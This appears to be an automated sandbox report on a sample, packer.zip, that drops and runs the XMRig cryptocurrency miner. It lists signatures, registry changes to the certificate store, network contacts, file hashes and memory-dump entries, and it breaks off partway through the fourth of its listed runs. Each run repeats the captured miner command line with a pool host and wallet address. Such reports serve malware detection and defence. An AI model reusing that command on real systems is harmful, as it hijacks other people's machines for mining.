Malware Analysis Report

2025-04-19 16:07

Sample ID 240522-sk9f8sfe65
Target packer.zip
SHA256 2712cfc84e57a8c2c3637bc69d65c1741fcb7a600c78709bbe3d47c5f76a4293
Tags xmrig miner
Score 10/10

Table of Contents

Analysis Overview
MITRE ATT&CK
    Enterprise Matrix V15
Analysis: static1
    Detonation Overview
    Signatures
Analysis: behavioral7
Analysis: behavioral12
Analysis: behavioral17
Analysis: behavioral20
Analysis: behavioral2
Analysis: behavioral3
Analysis: behavioral5
Analysis: behavioral11
Analysis: behavioral15
Analysis: behavioral18
Analysis: behavioral1
Analysis: behavioral6
Analysis: behavioral9
Analysis: behavioral10
Analysis: behavioral14
Analysis: behavioral19
Analysis: behavioral4
Analysis: behavioral8
Analysis: behavioral13
Analysis: behavioral16
    (each behavioral analysis: Detonation Overview, Command Line, Signatures, Processes, Network, Files)

Analysis Overview

Score 10/10

SHA256 2712cfc84e57a8c2c3637bc69d65c1741fcb7a600c78709bbe3d47c5f76a4293

Threat Level: Known bad

The file packer.zip was found to be: Known bad.

Malicious Activity Summary

xmrig miner

xmrig

XMRig Miner payload

Executes dropped EXE

Unsigned PE

Modifies system certificate store

Suspicious use of WriteProcessMemory

Suspicious use of AdjustPrivilegeToken

Suspicious use of FindShellTrayWindow

Suspicious behavior: LoadsDriver

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported

2024-05-22 15:12

Signatures

Unsigned PE

Description Indicator Process Target
N/A N/A N/A N/A

Analysis: behavioral7

Detonation Overview

Submitted

2024-05-22 15:12

Reported

2024-05-22 16:22

Platform

win10v2004-20240426-en

Max time kernel

1794s

Max time network

1804s

Command Line

"C:\Users\Admin\AppData\Local\Temp\main - Copy (4).exe"

Signatures

XMRig Miner payload

miner
Description Indicator Process Target
N/A N/A N/A N/A

xmrig

miner xmrig

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe N/A

Modifies system certificate store

evasion spyware trojan
Description Indicator Process Target
Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349 C:\Users\Admin\AppData\Local\Temp\main - Copy (4).exe N/A
Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349\Blob = [blob value removed] C:\Users\Admin\AppData\Local\Temp\main - Copy (4).exe N/A
Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349\Blob = [blob value removed] C:\Users\Admin\AppData\Local\Temp\main - Copy (4).exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe N/A

Processes

C:\Users\Admin\AppData\Local\Temp\main - Copy (4).exe

"C:\Users\Admin\AppData\Local\Temp\main - Copy (4).exe"

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe

xmrig-6.21.0\xmrig.exe --url pool.hashvault.pro:80 --user 46DiTxnXmukGpoGKFDViugiZA1Zuu181wJGSTvGVyJUv4HAdJaozh3jMX7nAEauswGVAUvLnY6tai2AbiKv9Pbt2EAsu8yR --pass T --donate-level 1 --tls --tls-fingerprint 420c7850e09b7c0bdcf748a7da9eb3647daf8515718f36d9ccfdd6b9ff834b14

Network

Country Destination Domain Proto
US 8.8.8.8:53 g.bing.com udp
US 204.79.197.237:443 g.bing.com tcp
NL 23.62.61.72:443 www.bing.com tcp
US 8.8.8.8:53 github.com udp
GB 20.26.156.215:443 github.com tcp
US 8.8.8.8:53 237.197.79.204.in-addr.arpa udp
US 8.8.8.8:53 149.220.183.52.in-addr.arpa udp
US 8.8.8.8:53 98.56.20.217.in-addr.arpa udp
US 8.8.8.8:53 95.221.229.192.in-addr.arpa udp
US 8.8.8.8:53 72.61.62.23.in-addr.arpa udp
US 8.8.8.8:53 objects.githubusercontent.com udp
US 185.199.110.133:443 objects.githubusercontent.com tcp
US 8.8.8.8:53 133.110.199.185.in-addr.arpa udp
US 8.8.8.8:53 215.156.26.20.in-addr.arpa udp
US 8.8.8.8:53 57.169.31.20.in-addr.arpa udp
US 8.8.8.8:53 69.31.126.40.in-addr.arpa udp
NL 23.62.61.72:443 www.bing.com tcp
US 8.8.8.8:53 pool.hashvault.pro udp
DE 95.179.241.203:80 pool.hashvault.pro tcp
US 8.8.8.8:53 203.241.179.95.in-addr.arpa udp
US 8.8.8.8:53 28.118.140.52.in-addr.arpa udp
US 8.8.8.8:53 26.165.165.52.in-addr.arpa udp
US 8.8.8.8:53 206.23.85.13.in-addr.arpa udp
US 8.8.8.8:53 25.24.18.2.in-addr.arpa udp
US 8.8.8.8:53 11.179.89.13.in-addr.arpa udp

Files

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe

MD5 e2fe87cc2c7dab8ca6516620dccd1381
SHA1 f714ec0448325435103519452610cf7aadf8bbba
SHA256 d0cf7388253342f43f9b04da27f3da9ee18614539efdc2d9c4a0239af51ddbe4
SHA512 8455c47e8470e0e322426bc9b9f3c7e858d803bfc8c5d576d580f88585f550b95043139d69b0750a3e211915e3f5ec7a67e7784dcf8cac6bd8fe51ab7e9cbed6

memory/4164-16-0x000001CE9FD50000-0x000001CE9FD70000-memory.dmp
memory/4164-17-0x000001CE9FDA0000-0x000001CE9FDC0000-memory.dmp
memory/4164-18-0x00007FF6C4EE0000-0x00007FF6C59E3000-memory.dmp
memory/4164-20-0x000001CE9FDE0000-0x000001CE9FE00000-memory.dmp
memory/4164-19-0x000001CE9FDC0000-0x000001CE9FDE0000-memory.dmp
memory/4164-21-0x00007FF6C4EE0000-0x00007FF6C59E3000-memory.dmp
memory/4164-22-0x00007FF6C4EE0000-0x00007FF6C59E3000-memory.dmp
memory/4164-25-0x000001CE9FDE0000-0x000001CE9FE00000-memory.dmp
memory/4164-24-0x000001CE9FDC0000-0x000001CE9FDE0000-memory.dmp
memory/4164-23-0x00007FF6C4EE0000-0x00007FF6C59E3000-memory.dmp
memory/4164-26-0x00007FF6C4EE0000-0x00007FF6C59E3000-memory.dmp
memory/4164-27-0x00007FF6C4EE0000-0x00007FF6C59E3000-memory.dmp
memory/4164-28-0x00007FF6C4EE0000-0x00007FF6C59E3000-memory.dmp
memory/4164-29-0x00007FF6C4EE0000-0x00007FF6C59E3000-memory.dmp
memory/4164-30-0x00007FF6C4EE0000-0x00007FF6C59E3000-memory.dmp
memory/4164-31-0x00007FF6C4EE0000-0x00007FF6C59E3000-memory.dmp
memory/4164-32-0x00007FF6C4EE0000-0x00007FF6C59E3000-memory.dmp
memory/4164-33-0x00007FF6C4EE0000-0x00007FF6C59E3000-memory.dmp
memory/4164-34-0x00007FF6C4EE0000-0x00007FF6C59E3000-memory.dmp
memory/4164-35-0x00007FF6C4EE0000-0x00007FF6C59E3000-memory.dmp
memory/4164-36-0x00007FF6C4EE0000-0x00007FF6C59E3000-memory.dmp
memory/4164-37-0x00007FF6C4EE0000-0x00007FF6C59E3000-memory.dmp
memory/4164-38-0x00007FF6C4EE0000-0x00007FF6C59E3000-memory.dmp
memory/4164-39-0x00007FF6C4EE0000-0x00007FF6C59E3000-memory.dmp
memory/4164-40-0x00007FF6C4EE0000-0x00007FF6C59E3000-memory.dmp
memory/4164-41-0x00007FF6C4EE0000-0x00007FF6C59E3000-memory.dmp
memory/4164-42-0x00007FF6C4EE0000-0x00007FF6C59E3000-memory.dmp
memory/4164-43-0x00007FF6C4EE0000-0x00007FF6C59E3000-memory.dmp
memory/4164-44-0x00007FF6C4EE0000-0x00007FF6C59E3000-memory.dmp
memory/4164-45-0x00007FF6C4EE0000-0x00007FF6C59E3000-memory.dmp
memory/4164-46-0x00007FF6C4EE0000-0x00007FF6C59E3000-memory.dmp
memory/4164-47-0x00007FF6C4EE0000-0x00007FF6C59E3000-memory.dmp
memory/4164-48-0x00007FF6C4EE0000-0x00007FF6C59E3000-memory.dmp
memory/4164-49-0x00007FF6C4EE0000-0x00007FF6C59E3000-memory.dmp
memory/4164-50-0x00007FF6C4EE0000-0x00007FF6C59E3000-memory.dmp
memory/4164-51-0x00007FF6C4EE0000-0x00007FF6C59E3000-memory.dmp
memory/4164-52-0x00007FF6C4EE0000-0x00007FF6C59E3000-memory.dmp
memory/4164-53-0x00007FF6C4EE0000-0x00007FF6C59E3000-memory.dmp
memory/4164-54-0x00007FF6C4EE0000-0x00007FF6C59E3000-memory.dmp
memory/4164-55-0x00007FF6C4EE0000-0x00007FF6C59E3000-memory.dmp
memory/4164-56-0x00007FF6C4EE0000-0x00007FF6C59E3000-memory.dmp
memory/4164-57-0x00007FF6C4EE0000-0x00007FF6C59E3000-memory.dmp
memory/4164-58-0x00007FF6C4EE0000-0x00007FF6C59E3000-memory.dmp
memory/4164-59-0x00007FF6C4EE0000-0x00007FF6C59E3000-memory.dmp
memory/4164-60-0x00007FF6C4EE0000-0x00007FF6C59E3000-memory.dmp
memory/4164-61-0x00007FF6C4EE0000-0x00007FF6C59E3000-memory.dmp
memory/4164-62-0x00007FF6C4EE0000-0x00007FF6C59E3000-memory.dmp
memory/4164-63-0x00007FF6C4EE0000-0x00007FF6C59E3000-memory.dmp
memory/4164-64-0x00007FF6C4EE0000-0x00007FF6C59E3000-memory.dmp
memory/4164-65-0x00007FF6C4EE0000-0x00007FF6C59E3000-memory.dmp
memory/4164-66-0x00007FF6C4EE0000-0x00007FF6C59E3000-memory.dmp
memory/4164-67-0x00007FF6C4EE0000-0x00007FF6C59E3000-memory.dmp
memory/4164-68-0x00007FF6C4EE0000-0x00007FF6C59E3000-memory.dmp
memory/4164-69-0x00007FF6C4EE0000-0x00007FF6C59E3000-memory.dmp
memory/4164-70-0x00007FF6C4EE0000-0x00007FF6C59E3000-memory.dmp
memory/4164-71-0x00007FF6C4EE0000-0x00007FF6C59E3000-memory.dmp
memory/4164-72-0x00007FF6C4EE0000-0x00007FF6C59E3000-memory.dmp
memory/4164-73-0x00007FF6C4EE0000-0x00007FF6C59E3000-memory.dmp
memory/4164-74-0x00007FF6C4EE0000-0x00007FF6C59E3000-memory.dmp
memory/4164-75-0x00007FF6C4EE0000-0x00007FF6C59E3000-memory.dmp
memory/4164-76-0x00007FF6C4EE0000-0x00007FF6C59E3000-memory.dmp
memory/4164-77-0x00007FF6C4EE0000-0x00007FF6C59E3000-memory.dmp
memory/4164-78-0x00007FF6C4EE0000-0x00007FF6C59E3000-memory.dmp
memory/4164-79-0x00007FF6C4EE0000-0x00007FF6C59E3000-memory.dmp
memory/4164-80-0x00007FF6C4EE0000-0x00007FF6C59E3000-memory.dmp
memory/4164-81-0x00007FF6C4EE0000-0x00007FF6C59E3000-memory.dmp
memory/4164-82-0x00007FF6C4EE0000-0x00007FF6C59E3000-memory.dmp
memory/4164-83-0x00007FF6C4EE0000-0x00007FF6C59E3000-memory.dmp
memory/4164-84-0x00007FF6C4EE0000-0x00007FF6C59E3000-memory.dmp

Analysis: behavioral12

Detonation Overview

Submitted

2024-05-22 15:12

Reported

2024-05-22 16:22

Platform

win10v2004-20240426-en

Max time kernel

1792s

Max time network

1787s

Command Line

"C:\Users\Admin\AppData\Local\Temp\main - Copy (7) - Copy.exe"

Signatures

XMRig Miner payload

miner
Description Indicator Process Target
N/A N/A N/A N/A

xmrig

miner xmrig

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe N/A

Processes

C:\Users\Admin\AppData\Local\Temp\main - Copy (7) - Copy.exe

"C:\Users\Admin\AppData\Local\Temp\main - Copy (7) - Copy.exe"

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe

xmrig-6.21.0\xmrig.exe --url pool.hashvault.pro:80 --user 46DiTxnXmukGpoGKFDViugiZA1Zuu181wJGSTvGVyJUv4HAdJaozh3jMX7nAEauswGVAUvLnY6tai2AbiKv9Pbt2EAsu8yR --pass T --donate-level 1 --tls --tls-fingerprint 420c7850e09b7c0bdcf748a7da9eb3647daf8515718f36d9ccfdd6b9ff834b14

Network

Country Destination Domain Proto
US 8.8.8.8:53 g.bing.com udp
US 204.79.197.237:443 g.bing.com tcp
US 8.8.8.8:53 github.com udp
GB 20.26.156.215:443 github.com tcp
US 8.8.8.8:53 237.197.79.204.in-addr.arpa udp
US 8.8.8.8:53 28.118.140.52.in-addr.arpa udp
US 8.8.8.8:53 18.24.18.2.in-addr.arpa udp
NL 23.62.61.106:443 www.bing.com tcp
US 8.8.8.8:53 objects.githubusercontent.com udp
US 185.199.109.133:443 objects.githubusercontent.com tcp
US 8.8.8.8:53 215.156.26.20.in-addr.arpa udp
US 8.8.8.8:53 133.109.199.185.in-addr.arpa udp
US 8.8.8.8:53 106.61.62.23.in-addr.arpa udp
US 8.8.8.8:53 pool.hashvault.pro udp
DE 45.76.89.70:80 pool.hashvault.pro tcp
US 8.8.8.8:53 70.89.76.45.in-addr.arpa udp
NL 23.62.61.75:443 www.bing.com tcp
US 8.8.8.8:53 75.61.62.23.in-addr.arpa udp
US 8.8.8.8:53 58.55.71.13.in-addr.arpa udp
US 8.8.8.8:53 86.23.85.13.in-addr.arpa udp
US 8.8.8.8:53 15.164.165.52.in-addr.arpa udp
US 8.8.8.8:53 138.136.73.23.in-addr.arpa udp
US 8.8.8.8:53 21.236.111.52.in-addr.arpa udp
US 8.8.8.8:53 tse1.mm.bing.net udp
US 204.79.197.200:443 tse1.mm.bing.net tcp
US 204.79.197.200:443 tse1.mm.bing.net tcp
US 204.79.197.200:443 tse1.mm.bing.net tcp
US 8.8.8.8:53 200.197.79.204.in-addr.arpa udp
US 8.8.8.8:53 12.173.189.20.in-addr.arpa udp

Files

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe

MD5 e2fe87cc2c7dab8ca6516620dccd1381
SHA1 f714ec0448325435103519452610cf7aadf8bbba
SHA256 d0cf7388253342f43f9b04da27f3da9ee18614539efdc2d9c4a0239af51ddbe4
SHA512 8455c47e8470e0e322426bc9b9f3c7e858d803bfc8c5d576d580f88585f550b95043139d69b0750a3e211915e3f5ec7a67e7784dcf8cac6bd8fe51ab7e9cbed6

memory/2928-16-0x000002118EC10000-0x000002118EC30000-memory.dmp
memory/2928-17-0x000002118EEA0000-0x000002118EEC0000-memory.dmp
memory/2928-18-0x00007FF6F0E70000-0x00007FF6F1973000-memory.dmp
memory/2928-20-0x0000021190680000-0x00000211906A0000-memory.dmp
memory/2928-19-0x00000211906A0000-0x00000211906C0000-memory.dmp
memory/2928-21-0x00007FF6F0E70000-0x00007FF6F1973000-memory.dmp
memory/2928-22-0x00007FF6F0E70000-0x00007FF6F1973000-memory.dmp
memory/2928-23-0x00007FF6F0E70000-0x00007FF6F1973000-memory.dmp
memory/2928-24-0x00000211906A0000-0x00000211906C0000-memory.dmp
memory/2928-25-0x0000021190680000-0x00000211906A0000-memory.dmp
memory/2928-26-0x00007FF6F0E70000-0x00007FF6F1973000-memory.dmp
memory/2928-27-0x00007FF6F0E70000-0x00007FF6F1973000-memory.dmp
memory/2928-28-0x00007FF6F0E70000-0x00007FF6F1973000-memory.dmp
memory/2928-29-0x00007FF6F0E70000-0x00007FF6F1973000-memory.dmp
memory/2928-30-0x00007FF6F0E70000-0x00007FF6F1973000-memory.dmp
memory/2928-31-0x00007FF6F0E70000-0x00007FF6F1973000-memory.dmp
memory/2928-32-0x00007FF6F0E70000-0x00007FF6F1973000-memory.dmp
memory/2928-33-0x00007FF6F0E70000-0x00007FF6F1973000-memory.dmp
memory/2928-34-0x00007FF6F0E70000-0x00007FF6F1973000-memory.dmp
memory/2928-35-0x00007FF6F0E70000-0x00007FF6F1973000-memory.dmp
memory/2928-36-0x00007FF6F0E70000-0x00007FF6F1973000-memory.dmp
memory/2928-37-0x00007FF6F0E70000-0x00007FF6F1973000-memory.dmp
memory/2928-38-0x00007FF6F0E70000-0x00007FF6F1973000-memory.dmp
memory/2928-39-0x00007FF6F0E70000-0x00007FF6F1973000-memory.dmp
memory/2928-40-0x00007FF6F0E70000-0x00007FF6F1973000-memory.dmp
memory/2928-41-0x00007FF6F0E70000-0x00007FF6F1973000-memory.dmp
memory/2928-42-0x00007FF6F0E70000-0x00007FF6F1973000-memory.dmp
memory/2928-43-0x00007FF6F0E70000-0x00007FF6F1973000-memory.dmp
memory/2928-44-0x00007FF6F0E70000-0x00007FF6F1973000-memory.dmp
memory/2928-45-0x00007FF6F0E70000-0x00007FF6F1973000-memory.dmp
memory/2928-46-0x00007FF6F0E70000-0x00007FF6F1973000-memory.dmp
memory/2928-47-0x00007FF6F0E70000-0x00007FF6F1973000-memory.dmp
memory/2928-48-0x00007FF6F0E70000-0x00007FF6F1973000-memory.dmp
memory/2928-49-0x00007FF6F0E70000-0x00007FF6F1973000-memory.dmp
memory/2928-50-0x00007FF6F0E70000-0x00007FF6F1973000-memory.dmp
memory/2928-51-0x00007FF6F0E70000-0x00007FF6F1973000-memory.dmp
memory/2928-52-0x00007FF6F0E70000-0x00007FF6F1973000-memory.dmp
memory/2928-53-0x00007FF6F0E70000-0x00007FF6F1973000-memory.dmp
memory/2928-54-0x00007FF6F0E70000-0x00007FF6F1973000-memory.dmp
memory/2928-55-0x00007FF6F0E70000-0x00007FF6F1973000-memory.dmp
memory/2928-56-0x00007FF6F0E70000-0x00007FF6F1973000-memory.dmp
memory/2928-57-0x00007FF6F0E70000-0x00007FF6F1973000-memory.dmp
memory/2928-58-0x00007FF6F0E70000-0x00007FF6F1973000-memory.dmp
memory/2928-59-0x00007FF6F0E70000-0x00007FF6F1973000-memory.dmp
memory/2928-60-0x00007FF6F0E70000-0x00007FF6F1973000-memory.dmp
memory/2928-61-0x00007FF6F0E70000-0x00007FF6F1973000-memory.dmp
memory/2928-62-0x00007FF6F0E70000-0x00007FF6F1973000-memory.dmp
memory/2928-63-0x00007FF6F0E70000-0x00007FF6F1973000-memory.dmp
memory/2928-64-0x00007FF6F0E70000-0x00007FF6F1973000-memory.dmp
memory/2928-65-0x00007FF6F0E70000-0x00007FF6F1973000-memory.dmp
memory/2928-66-0x00007FF6F0E70000-0x00007FF6F1973000-memory.dmp
memory/2928-67-0x00007FF6F0E70000-0x00007FF6F1973000-memory.dmp
memory/2928-68-0x00007FF6F0E70000-0x00007FF6F1973000-memory.dmp
memory/2928-69-0x00007FF6F0E70000-0x00007FF6F1973000-memory.dmp
memory/2928-70-0x00007FF6F0E70000-0x00007FF6F1973000-memory.dmp
memory/2928-71-0x00007FF6F0E70000-0x00007FF6F1973000-memory.dmp
memory/2928-72-0x00007FF6F0E70000-0x00007FF6F1973000-memory.dmp
memory/2928-73-0x00007FF6F0E70000-0x00007FF6F1973000-memory.dmp
memory/2928-74-0x00007FF6F0E70000-0x00007FF6F1973000-memory.dmp
memory/2928-75-0x00007FF6F0E70000-0x00007FF6F1973000-memory.dmp
memory/2928-76-0x00007FF6F0E70000-0x00007FF6F1973000-memory.dmp
memory/2928-77-0x00007FF6F0E70000-0x00007FF6F1973000-memory.dmp
memory/2928-78-0x00007FF6F0E70000-0x00007FF6F1973000-memory.dmp
memory/2928-79-0x00007FF6F0E70000-0x00007FF6F1973000-memory.dmp
memory/2928-80-0x00007FF6F0E70000-0x00007FF6F1973000-memory.dmp
memory/2928-81-0x00007FF6F0E70000-0x00007FF6F1973000-memory.dmp
memory/2928-82-0x00007FF6F0E70000-0x00007FF6F1973000-memory.dmp
memory/2928-83-0x00007FF6F0E70000-0x00007FF6F1973000-memory.dmp
memory/2928-84-0x00007FF6F0E70000-0x00007FF6F1973000-memory.dmp

Analysis: behavioral17

Detonation Overview

Submitted

2024-05-22 15:12

Reported

2024-05-22 16:24

Platform

win10v2004-20240426-en

Max time kernel

1793s

Max time network

1783s

Command Line

"C:\Users\Admin\AppData\Local\Temp\main - Copy (9).exe"

Signatures

XMRig Miner payload

miner
Description Indicator Process Target
N/A N/A N/A N/A

xmrig

miner xmrig

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe N/A

Processes

C:\Users\Admin\AppData\Local\Temp\main - Copy (9).exe

"C:\Users\Admin\AppData\Local\Temp\main - Copy (9).exe"

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe

xmrig-6.21.0\xmrig.exe --url pool.hashvault.pro:80 --user 46DiTxnXmukGpoGKFDViugiZA1Zuu181wJGSTvGVyJUv4HAdJaozh3jMX7nAEauswGVAUvLnY6tai2AbiKv9Pbt2EAsu8yR --pass T --donate-level 1 --tls --tls-fingerprint 420c7850e09b7c0bdcf748a7da9eb3647daf8515718f36d9ccfdd6b9ff834b14

Network

Country Destination Domain Proto
US 8.8.8.8:53 13.86.106.20.in-addr.arpa udp
US 8.8.8.8:53 8.8.8.8.in-addr.arpa udp
US 8.8.8.8:53 github.com udp
GB 20.26.156.215:443 github.com tcp
US 8.8.8.8:53 g.bing.com udp
US 8.8.8.8:53 25.24.18.2.in-addr.arpa udp
US 8.8.8.8:53 215.156.26.20.in-addr.arpa udp
US 204.79.197.237:443 g.bing.com tcp
US 8.8.8.8:53 objects.githubusercontent.com udp
US 185.199.110.133:443 objects.githubusercontent.com tcp
NL 23.62.61.72:443 www.bing.com tcp
US 8.8.8.8:53 237.197.79.204.in-addr.arpa udp
US 8.8.8.8:53 76.32.126.40.in-addr.arpa udp
US 8.8.8.8:53 95.221.229.192.in-addr.arpa udp
US 8.8.8.8:53 133.110.199.185.in-addr.arpa udp
US 8.8.8.8:53 72.61.62.23.in-addr.arpa udp
US 8.8.8.8:53 pool.hashvault.pro udp
DE 45.76.89.70:80 pool.hashvault.pro tcp
US 8.8.8.8:53 70.89.76.45.in-addr.arpa udp
US 8.8.8.8:53 149.220.183.52.in-addr.arpa udp
US 8.8.8.8:53 157.123.68.40.in-addr.arpa udp
US 8.8.8.8:53 198.187.3.20.in-addr.arpa udp
US 8.8.8.8:53 18.24.18.2.in-addr.arpa udp
US 8.8.8.8:53 36.56.20.217.in-addr.arpa udp
US 8.8.8.8:53 104.116.69.13.in-addr.arpa udp

Files

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe

MD5 e2fe87cc2c7dab8ca6516620dccd1381
SHA1 f714ec0448325435103519452610cf7aadf8bbba
SHA256 d0cf7388253342f43f9b04da27f3da9ee18614539efdc2d9c4a0239af51ddbe4
SHA512 8455c47e8470e0e322426bc9b9f3c7e858d803bfc8c5d576d580f88585f550b95043139d69b0750a3e211915e3f5ec7a67e7784dcf8cac6bd8fe51ab7e9cbed6

memory/2140-16-0x000002228D5B0000-0x000002228D5D0000-memory.dmp
memory/2140-17-0x000002228D600000-0x000002228D620000-memory.dmp
memory/2140-18-0x00007FF637D10000-0x00007FF638813000-memory.dmp
memory/2140-19-0x000002228D620000-0x000002228D640000-memory.dmp
memory/2140-20-0x000002228D640000-0x000002228D660000-memory.dmp
memory/2140-21-0x00007FF637D10000-0x00007FF638813000-memory.dmp
memory/2140-22-0x00007FF637D10000-0x00007FF638813000-memory.dmp
memory/2140-23-0x000002228D620000-0x000002228D640000-memory.dmp
memory/2140-25-0x000002228D640000-0x000002228D660000-memory.dmp
memory/2140-24-0x00007FF637D10000-0x00007FF638813000-memory.dmp
memory/2140-26-0x00007FF637D10000-0x00007FF638813000-memory.dmp
memory/2140-27-0x00007FF637D10000-0x00007FF638813000-memory.dmp
memory/2140-28-0x00007FF637D10000-0x00007FF638813000-memory.dmp
memory/2140-29-0x00007FF637D10000-0x00007FF638813000-memory.dmp
memory/2140-30-0x00007FF637D10000-0x00007FF638813000-memory.dmp
memory/2140-31-0x00007FF637D10000-0x00007FF638813000-memory.dmp
memory/2140-32-0x00007FF637D10000-0x00007FF638813000-memory.dmp
memory/2140-33-0x00007FF637D10000-0x00007FF638813000-memory.dmp
memory/2140-34-0x00007FF637D10000-0x00007FF638813000-memory.dmp
memory/2140-35-0x00007FF637D10000-0x00007FF638813000-memory.dmp
memory/2140-36-0x00007FF637D10000-0x00007FF638813000-memory.dmp
memory/2140-37-0x00007FF637D10000-0x00007FF638813000-memory.dmp
memory/2140-38-0x00007FF637D10000-0x00007FF638813000-memory.dmp
memory/2140-39-0x00007FF637D10000-0x00007FF638813000-memory.dmp
memory/2140-40-0x00007FF637D10000-0x00007FF638813000-memory.dmp
memory/2140-41-0x00007FF637D10000-0x00007FF638813000-memory.dmp
memory/2140-42-0x00007FF637D10000-0x00007FF638813000-memory.dmp
memory/2140-43-0x00007FF637D10000-0x00007FF638813000-memory.dmp
memory/2140-44-0x00007FF637D10000-0x00007FF638813000-memory.dmp
memory/2140-45-0x00007FF637D10000-0x00007FF638813000-memory.dmp
memory/2140-46-0x00007FF637D10000-0x00007FF638813000-memory.dmp
memory/2140-47-0x00007FF637D10000-0x00007FF638813000-memory.dmp
memory/2140-48-0x00007FF637D10000-0x00007FF638813000-memory.dmp
memory/2140-49-0x00007FF637D10000-0x00007FF638813000-memory.dmp
memory/2140-50-0x00007FF637D10000-0x00007FF638813000-memory.dmp
memory/2140-51-0x00007FF637D10000-0x00007FF638813000-memory.dmp
memory/2140-52-0x00007FF637D10000-0x00007FF638813000-memory.dmp
memory/2140-53-0x00007FF637D10000-0x00007FF638813000-memory.dmp
memory/2140-54-0x00007FF637D10000-0x00007FF638813000-memory.dmp
memory/2140-55-0x00007FF637D10000-0x00007FF638813000-memory.dmp
memory/2140-56-0x00007FF637D10000-0x00007FF638813000-memory.dmp
memory/2140-57-0x00007FF637D10000-0x00007FF638813000-memory.dmp
memory/2140-58-0x00007FF637D10000-0x00007FF638813000-memory.dmp
memory/2140-59-0x00007FF637D10000-0x00007FF638813000-memory.dmp
memory/2140-60-0x00007FF637D10000-0x00007FF638813000-memory.dmp
memory/2140-61-0x00007FF637D10000-0x00007FF638813000-memory.dmp
memory/2140-62-0x00007FF637D10000-0x00007FF638813000-memory.dmp
memory/2140-63-0x00007FF637D10000-0x00007FF638813000-memory.dmp
memory/2140-64-0x00007FF637D10000-0x00007FF638813000-memory.dmp
memory/2140-65-0x00007FF637D10000-0x00007FF638813000-memory.dmp
memory/2140-66-0x00007FF637D10000-0x00007FF638813000-memory.dmp
memory/2140-67-0x00007FF637D10000-0x00007FF638813000-memory.dmp
memory/2140-68-0x00007FF637D10000-0x00007FF638813000-memory.dmp
memory/2140-69-0x00007FF637D10000-0x00007FF638813000-memory.dmp
memory/2140-70-0x00007FF637D10000-0x00007FF638813000-memory.dmp
memory/2140-71-0x00007FF637D10000-0x00007FF638813000-memory.dmp
memory/2140-72-0x00007FF637D10000-0x00007FF638813000-memory.dmp
memory/2140-73-0x00007FF637D10000-0x00007FF638813000-memory.dmp
memory/2140-74-0x00007FF637D10000-0x00007FF638813000-memory.dmp
memory/2140-75-0x00007FF637D10000-0x00007FF638813000-memory.dmp
memory/2140-76-0x00007FF637D10000-0x00007FF638813000-memory.dmp
memory/2140-77-0x00007FF637D10000-0x00007FF638813000-memory.dmp
memory/2140-78-0x00007FF637D10000-0x00007FF638813000-memory.dmp
memory/2140-79-0x00007FF637D10000-0x00007FF638813000-memory.dmp
memory/2140-80-0x00007FF637D10000-0x00007FF638813000-memory.dmp
memory/2140-81-0x00007FF637D10000-0x00007FF638813000-memory.dmp
memory/2140-82-0x00007FF637D10000-0x00007FF638813000-memory.dmp
memory/2140-83-0x00007FF637D10000-0x00007FF638813000-memory.dmp
memory/2140-84-0x00007FF637D10000-0x00007FF638813000-memory.dmp

Analysis: behavioral20

Detonation Overview

Submitted

2024-05-22 15:12

Reported

2024-05-22 16:33

Platform

win10v2004-20240426-en

Max time kernel

1796s

Max time network

1798s

Command Line

"C:\Users\Admin\AppData\Local\Temp\main.exe"

Signatures

XMRig Miner payload

miner
Description Indicator Process Target
N/A N/A N/A N/A

xmrig

miner xmrig

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe N/A

Modifies system certificate store

evasion spyware trojan
Description Indicator Process Target
Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349 C:\Users\Admin\AppData\Local\Temp\main.exe N/A
